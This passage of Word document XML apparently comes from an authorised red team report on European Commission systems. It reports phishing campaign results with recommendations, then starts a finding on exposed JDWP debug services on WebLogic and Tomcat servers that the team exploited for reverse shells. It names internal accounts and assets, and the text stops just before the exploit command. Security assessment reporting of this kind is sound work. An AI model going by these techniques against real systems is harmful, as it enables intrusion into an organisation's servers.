              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Initial</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1777" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="23F41004" w14:textId="77777777" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="007455CA">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="120" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1566</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="651721DF" w14:textId="36B95FD6" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="007455CA">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A229977" w14:textId="77777777" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00901AD4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CC79A7" w14:textId="6597B625" w:rsidR="00C271E2" w:rsidRPr="001019D3" w:rsidRDefault="00A23C16" w:rsidP="00A23C16">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Two separate phishing campaigns were authorized to be performed by </w:t>
      </w:r>
      <w:r w:rsidR="00901AD4" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">the Red Team </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>on two sets of users with different goals</w:t>
      </w:r>
      <w:r w:rsidR="00C271E2" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> (list was provided by the Initiator)</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC2A6D9" w14:textId="259B7C7B" w:rsidR="00C271E2" w:rsidRPr="001019D3" w:rsidRDefault="00A23C16" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>CLIMA staff (having *.ec.europa.eu emails, including</w:t>
      </w:r>
      <w:r w:rsidR="00C271E2" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C271E2" w:rsidRPr="001019D3">
        <w:t>ext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>) to simulate a potential compromise of a corporate workstation and user account that has access to the internal network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59549E3B" w14:textId="77777777" w:rsidR="00C271E2" w:rsidRPr="001019D3" w:rsidRDefault="00C271E2" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00A23C16" w:rsidRPr="001019D3">
        <w:t>xternal Service Providers (not having an *.ec.europa.eu email) that have accounts to access the AWS SRV4DEV environment, specifically on the Gitlab code repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C663443" w14:textId="08D0E5C8" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00A23C16" w:rsidP="00C271E2">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>In both campaigns, it was noticed that s</w:t>
      </w:r>
      <w:r w:rsidR="00901AD4" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">everal users clicked on malicious links in </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">created </w:t>
      </w:r>
      <w:r w:rsidR="00901AD4" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">phishing emails. This demonstrates a weakness in user awareness and email security controls, enabling attackers to gain an initial foothold in the environment. By interacting with these links, users may inadvertently download malware, disclose credentials, or provide adversaries with access to internal systems. This type of human-driven vulnerability bypasses many perimeter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00901AD4" w:rsidRPr="001019D3">
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00901AD4" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and highlights the effectiveness of social engineering as an attack vector. If exploited in a real-world scenario, phishing could lead to unauthorized access, credential theft, lateral movement, eventual compromise of critical business assets</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and data theft</w:t>
      </w:r>
      <w:r w:rsidR="00901AD4" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">. The repeated success of this tactic underscores the importance of both technical </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00901AD4" w:rsidRPr="001019D3">
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00901AD4" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and user education in reducing organizational exposure to social engineering threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CABDB6" w14:textId="343E805C" w:rsidR="00C271E2" w:rsidRPr="001019D3" w:rsidRDefault="00C271E2" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFC775F" w14:textId="77777777" w:rsidR="00C271E2" w:rsidRPr="001019D3" w:rsidRDefault="00C271E2" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>A total of 90 phishing emails was sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA542EF" w14:textId="08E65FA2" w:rsidR="00C271E2" w:rsidRPr="001019D3" w:rsidRDefault="00C271E2" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>All emails where successfully delivered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354127DA" w14:textId="28D55372" w:rsidR="00C271E2" w:rsidRPr="001019D3" w:rsidRDefault="00C271E2" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>47% of recipients opened the email</w:t>
      </w:r>
      <w:r w:rsidR="00C131C8" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> (majority on the AWS Gitlab campaign)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A2EE5" w14:textId="3FFF1E98" w:rsidR="00C271E2" w:rsidRPr="001019D3" w:rsidRDefault="00C271E2" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>42% clicked on the embedded malicious link</w:t>
      </w:r>
      <w:r w:rsidR="00C131C8" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> (majority on the AWS Gitlab campaign)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E851C90" w14:textId="11F658BC" w:rsidR="00C271E2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:ind w:left="811" w:hanging="357"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>In both campaigns a</w:t>
      </w:r>
      <w:r w:rsidR="00C271E2" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> subset of users attempted to enter credentials on the spoofed login page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F59433" w14:textId="77777777" w:rsidR="00C271E2" w:rsidRPr="001019D3" w:rsidRDefault="00A23C16" w:rsidP="00C271E2">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78C12ED6" wp14:editId="07292031">
            <wp:extent cx="5393543" cy="3670300"/>
            <wp:effectExtent l="19050" t="19050" r="0" b="6350"/>
            <wp:docPr id="136393644"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644" name="Picture 1" descr="A screenshot of a dashboar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38542" cy="3700922"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EB879" w14:textId="3FDC7F34" w:rsidR="00A23C16" w:rsidRPr="001019D3" w:rsidRDefault="00C271E2" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="150" w:name="_Toc213253789"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Phishing exercise summary.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w14:paraId="01C60215" w14:textId="0B6034B3" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00C131C8">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF9236B" w14:textId="599DEDF3" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Provide ongoing security awareness training and simulated phishing exercises to educate employees on recognizing and reporting suspicious emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162F00BE" w14:textId="0460DE4E" w:rsidR="00C271E2" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Establish clear incident reporting procedures so that potential phishing attempts can be escalated quickly to the security team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37088BD8" w14:textId="1991AB2F" w:rsidR="00C271E2" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Implement strong technical safeguards such as multi-factor authentication (MFA) to limit the impact of compromised credentials</w:t>
      </w:r>
      <w:r w:rsidR="00C271E2" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DAC68B" w14:textId="07099DB3" w:rsidR="00BC1BFC" w:rsidRPr="001019D3" w:rsidRDefault="00C271E2" w:rsidP="00C271E2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00901AD4" w:rsidRPr="001019D3">
        <w:t>onsider browser isolation or link protection services to reduce exposure from malicious sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F3968D" w14:textId="77777777" w:rsidR="00BC1BFC" w:rsidRPr="001019D3" w:rsidRDefault="00BC1BFC">
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0DC384" w14:textId="30290311" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00901AD4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="_Toc213253566"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Internal or insider perspective</w:t>
      </w:r>
      <w:r w:rsidR="004356D9" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
    </w:p>
    <w:p w14:paraId="492E9FA1" w14:textId="1108551F" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="00E224E7" w:rsidP="00BC6EA4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="731" w:hanging="731"/>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="_Toc211324787"/>
      <w:bookmarkStart w:id="153" w:name="_Toc213253567"/>
      <w:bookmarkEnd w:id="143"/>
      <w:bookmarkEnd w:id="144"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Java Debug Bridge vulnerable service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
      <w:bookmarkEnd w:id="153"/>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2"/>
        <w:gridCol w:w="2416"/>
        <w:gridCol w:w="1916"/>
        <w:gridCol w:w="3106"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B4EBB" w:rsidRPr="001019D3" w14:paraId="03E05F64" w14:textId="77777777" w:rsidTr="007455CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="745" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CAECF76" w14:textId="77777777" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="003B4EBB" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7959B1E3" w14:textId="77777777" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="003B4EBB" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impacted assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2874" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="010A515F" w14:textId="77777777" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="003B4EBB" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ATT&amp;CK MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B4EBB" w:rsidRPr="001019D3" w14:paraId="545C7BF5" w14:textId="77777777" w:rsidTr="007455CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="745" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51B82372" w14:textId="796B7B55" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="007455CA" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2034A085" w14:textId="5899B871" w:rsidR="00BC6EA4" w:rsidRPr="001019D3" w:rsidRDefault="007455CA" w:rsidP="00386006">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ETS WebLogic and Tomcat servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="481B07F4" w14:textId="77777777" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="003B4EBB" w:rsidP="007455CA">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TA-0008</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5279ED9D" w14:textId="3F93D145" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="003B4EBB" w:rsidP="007455CA">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1778" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="201D2B36" w14:textId="77777777" w:rsidR="007455CA" w:rsidRPr="001019D3" w:rsidRDefault="003B4EBB" w:rsidP="007455CA">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T1210</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7861A0A3" w14:textId="2DDDFE01" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="003B4EBB" w:rsidP="00D17500">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Exploitation of Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22ABF41B" w14:textId="77777777" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="003B4EBB" w:rsidP="007455CA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C63194" w14:textId="03799413" w:rsidR="007455CA" w:rsidRPr="001019D3" w:rsidRDefault="007455CA" w:rsidP="007455CA">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The internal network reconnaissance revealed that several </w:t>
      </w:r>
      <w:r w:rsidR="003738E7" w:rsidRPr="001019D3">
        <w:t>ETS</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> related servers in all environments, including production, have the Java Debug Wire (JDWP) service exposed. JDWP is a commonly used service among developers for debugging applications during the development phase and is an integral part of the European Commission’s DevSecOps processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F68D19C" w14:textId="77777777" w:rsidR="007455CA" w:rsidRPr="001019D3" w:rsidRDefault="007455CA" w:rsidP="007455CA">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Although it is a valuable debugging tool for developers, JDWP also poses a significant security risk due to the lack of authentication and encryption. Attackers can exploit JDWP to remotely execute code on the affected server, potentially compromising the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728A114A" w14:textId="02842154" w:rsidR="007455CA" w:rsidRPr="001019D3" w:rsidRDefault="007455CA" w:rsidP="007455CA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C21A45" w14:textId="0B0E35E0" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="003B4EBB" w:rsidP="003738E7">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The Red Team developed a custom payload to exploit this service and successfully compromised several </w:t>
      </w:r>
      <w:r w:rsidR="003738E7" w:rsidRPr="001019D3">
        <w:t>ETS</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003738E7" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">related </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">servers to obtain remote access on the vulnerable systems. The vulnerable JDWP service was running on various servers with the privileges of the user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>wlsopert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>tomopert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>, which did not have administrative privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A8370" w14:textId="7423F612" w:rsidR="00302F61" w:rsidRPr="001019D3" w:rsidRDefault="00302F61" w:rsidP="003738E7">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Depending on the network positioning it was possible to establish connection with the various servers using two techniques, either deploying a listener on the server hosting the vulnerable service or forcing the vulnerable server to connect back to the attacking machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE6BD91" w14:textId="37036992" w:rsidR="00302F61" w:rsidRPr="001019D3" w:rsidRDefault="00302F61" w:rsidP="003738E7">
      <w:pPr>
        <w:spacing w:after="60" w:afterAutospacing="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse shell connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A24488" w14:textId="35DF359F" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="003738E7" w:rsidP="003738E7">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The Red Team developed a custom python script that allows to exploit the vulnerable JDWP service</w:t>
      </w:r>
      <w:r w:rsidR="00AF25D4" w:rsidRPr="001019D3">
        <w:t>, allowing to provide a malicious payload to be executed by the remote operating system.</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B4EBB" w:rsidRPr="001019D3">
        <w:t>The below command was issued</w:t>
      </w:r>
      <w:r w:rsidR="00302F61" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> against </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00302F61" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> vulnerable JDWP service</w:t>
      </w:r>
      <w:r w:rsidR="003B4EBB" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00AF25D4" w:rsidRPr="001019D3">
        <w:t>establish</w:t>
      </w:r>
